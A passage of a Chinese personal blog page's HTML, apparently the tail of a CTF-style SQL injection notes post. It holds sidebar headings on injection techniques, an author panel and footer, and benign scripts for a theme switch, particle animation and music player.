class="nav-text">截断函数</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">12.</span> <span class="nav-text">堆叠注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E8%AF%AD%E5%8F%A5"><span class="nav-number">12.0.1.</span> <span class="nav-text">堆叠注入语句</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#handler-%E5%8F%A5%E6%9F%84"><span class="nav-number">12.1.</span> <span class="nav-text">handler(句柄)</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">13.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#updatexml%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">13.1.</span> <span class="nav-text">updatexml报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-HardSQL"><span class="nav-number">13.1.1.</span> <span class="nav-text">[极客大挑战 2019]HardSQL</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%84payload"><span class="nav-number">13.1.2.</span> <span class="nav-text">常规payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%9B%B2%E6%B3%A8"><span class="nav-number">14.</span> <span class="nav-text">盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="nav-number">14.1.</span> <span class="nav-text">布尔盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BD%E6%95%B0"><span class="nav-number">14.1.1.</span> <span class="nav-text">函数</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-number">14.2.</span> <span class="nav-text">时间盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="nav-number">14.3.</span> <span class="nav-text">参考链接：</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="谷氨酸棒状杆菌"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">谷氨酸棒状杆菌</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">64</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">94</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Glut4micum" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Glut4micum" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">谷氨酸棒状杆菌</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div> -->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总访客量 fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总阅读量 fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<canvas id="particles-canvas"></canvas>


<button class="theme-switch-btn" id="themeSwitchBtn" title="切换明暗模式" aria-label="切换明暗模式">
  <i class="icon-moon fa fa-moon"></i>
  <i class="icon-sun fa fa-sun"></i>
</button>


<audio id="bgMusic" preload="none"></audio>

<script>
(function () {
  // ========== 明暗模式 ==========
  var rootEl = document.documentElement;
  var STORAGE_KEY = 'blog-theme';

  function applyTheme(theme) {
    rootEl.setAttribute('data-theme', theme);
    try { localStorage.setItem(STORAGE_KEY, theme); } catch (e) {}
  }

  var saved;
  try { saved = localStorage.getItem(STORAGE_KEY); } catch (e) {}
  applyTheme(saved === 'light' ? 'light' : 'dark');

  document.getElementById('themeSwitchBtn').addEventListener('click', function () {
    var current = rootEl.getAttribute('data-theme') === 'light' ? 'dark' : 'light';
    applyTheme(current);
  });

  // ========== Canvas 连线粒子 ==========
  var canvas = document.getElementById('particles-canvas');
  var ctx = canvas.getContext('2d');
  var particles = [];
  var mouse = { x: null, y: null };
  var COUNT = 70;
  var LINK_DIST = 140;

  function resize() {
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
  }
  resize();
  window.addEventListener('resize', resize);

  function random(min, max) { return Math.random() * (max - min) + min; }

  function createParticles() {
    particles = [];
    for (var i = 0; i < COUNT; i++) {
      particles.push({
        x: Math.random() * canvas.width,
        y: Math.random() * canvas.height,
        vx: random(-0.5, 0.5),
        vy: random(-0.5, 0.5),
        r: random(1, 2.5)
      });
    }
  }
  createParticles();

  window.addEventListener('mousemove', function (e) {
    mouse.x = e.clientX;
    mouse.y = e.clientY;
  });
  window.addEventListener('mouseout', function () {
    mouse.x = null;
    mouse.y = null;
  });

  function draw() {
    ctx.clearRect(0, 0, canvas.width, canvas.height);
    var i, j, dx, dy, dist, alpha;
    for (i = 0; i < particles.length; i++) {
      for (j = i + 1; j < particles.length; j++) {
        dx = particles[i].x - particles[j].x;
        dy = particles[i].y - particles[j].y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST) {
          alpha = 1 - dist / LINK_DIST;
          ctx.strokeStyle = 'rgba(120, 200, 255, ' + (alpha * 0.5).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(particles[j].x, particles[j].y);
          ctx.stroke();
        }
      }
    }
    if (mouse.x !== null) {
      for (i = 0; i < particles.length; i++) {
        dx = particles[i].x - mouse.x;
        dy = particles[i].y - mouse.y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST * 1.2) {
          alpha = 1 - dist / (LINK_DIST * 1.2);
          ctx.strokeStyle = 'rgba(255, 255, 255, ' + (alpha * 0.4).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(mouse.x, mouse.y);
          ctx.stroke();
        }
      }
    }
    for (i = 0; i < particles.length; i++) {
      var p = particles[i];
      p.x += p.vx;
      p.y += p.vy;
      if (p.x < 0 || p.x > canvas.width) p.vx *= -1;
      if (p.y < 0 || p.y > canvas.height) p.vy *= -1;
      ctx.beginPath();
      ctx.arc(p.x, p.y, p.r, 0, Math.PI * 2);
      ctx.fillStyle = 'rgba(140, 210, 255, 0.85)';
      ctx.fill();
    }
    requestAnimationFrame(draw);
  }
  draw();

  // ========== 侧边栏音乐播放器 ==========
  // 歌单：本地 MP3 文件（存放于 source/music/ 目录）
  var playlist = [
    { name: '晴天', url: '/music/晴天.mp3' },
    { name: '失控', url: '/music/失控.mp3' },
    { name: '青花', url: '/music/青花.mp3' }
  ];

  var audio = document.getElementById('bgMusic');
  var currentIdx = 0;
  var isPlaying = false;

  function buildPlayer() {
    var sidebar = document.querySelector('.sidebar-inner');
    if (!sidebar) {
      setTimeout(buildPlayer, 500);
      return;
    }

    // 避免重复插入
    if (sidebar.querySelector('.music-widget')) return;

    var widget = document.createElement('div');
    widget.className = 'music-widget';
    widget.innerHTML =
      '<div class="music-title" id="musicTitle">点击播放音乐</div>' +
      '<div class="music-controls">' +
        '<button class="music-btn" id="musicPrev" title="上一首"><i class="fa fa-step-backward"></i></button>' +
        '<button class="music-btn" id="musicPlay" title="播放/暂停"><i class="fa fa-play"></i></button>' +
        '<button class="music-btn" id="musicNext" title="下一首"><i class="fa fa-step-forward"></i></button>' +
      '</div>' +
      '<div class="music-controls" style="margin-top:8px;">' +
        '<i class="fa fa-volume-down" style="font-size:11px;color:var(--text-color-3);"></i>' +
        '<input type="range" class="music-volume" id="musicVolume" min="0" max="100" value="50">' +
        '<i class="fa fa-volume-up" style="font-size:11px;color:var(--text-color-3);"></i>' +
      '</div>';
    sidebar.appendChild(widget);

    var btnPlay = document.getElementById('musicPlay');
    var btnPrev = document.getElementById('musicPrev');
    var btnNext = document.getElementById('musicNext');
    var volSlider = document.getElementById('musicVolume');
    var titleEl = document.getElementById('musicTitle');

    audio.volume = 0.5;

    btnPlay.addEventListener('click', function () {
      if (isPlaying) {
        audio.pause();
      } else {
        loadAndPlay(currentIdx);
      }
    });

    btnPrev.addEventListener('click', function () {
      currentIdx = (currentIdx - 1 + playlist.length) % playlist.length;
      loadAndPlay(currentIdx);
    });

    btnNext.addEventListener('click', function () {
      currentIdx = (currentIdx + 1) % playlist.length;
      loadAndPlay(currentIdx);
    });

    volSlider.addEventListener('input', function () {
      audio.volume = this.value / 100;
    });

    audio.addEventListener('ended', function () {
      currentIdx = (currentIdx + 1) % playlist.length;
      loadAndPlay(currentIdx);
    });

    audio.addEventListener('play', function () {
      isPlaying = true;
      btnPlay.classList.add('playing');
      btnPlay.innerHTML = '<i class="fa fa-pause"></i>';
    });

    audio.addEventListener('pause', function () {
      isPlaying = false;
      btnPlay.classList.remove('playing');
      btnPlay.innerHTML = '<i class="fa fa-play"></i>';
    });

    audio.addEventListener('error', function () {
      titleEl.textContent = '播放失败，尝试下一首...';
      setTimeout(function () {
        currentIdx = (currentIdx + 1) % playlist.length;
        loadAndPlay(currentIdx);
      }, 1500);
    });
  }

  function loadAndPlay(idx) {
    var titleEl = document.getElementById('musicTitle');
    if (titleEl) titleEl.textContent = playlist[idx].name;
    audio.src = playlist[idx].url;
    audio.load();
    var p = audio.play();
    if (p && p.catch) {
      p.catch(function () {
        if (titleEl) titleEl.textContent = '点击播放 — ' + playlist[idx].name;
      });
    }
  }

  if (document.readyState === 'complete') {
    buildPlayer();
  } else {
    window.addEventListener('load', buildPlayer);
  }
})();
</script>
</body>
</html>
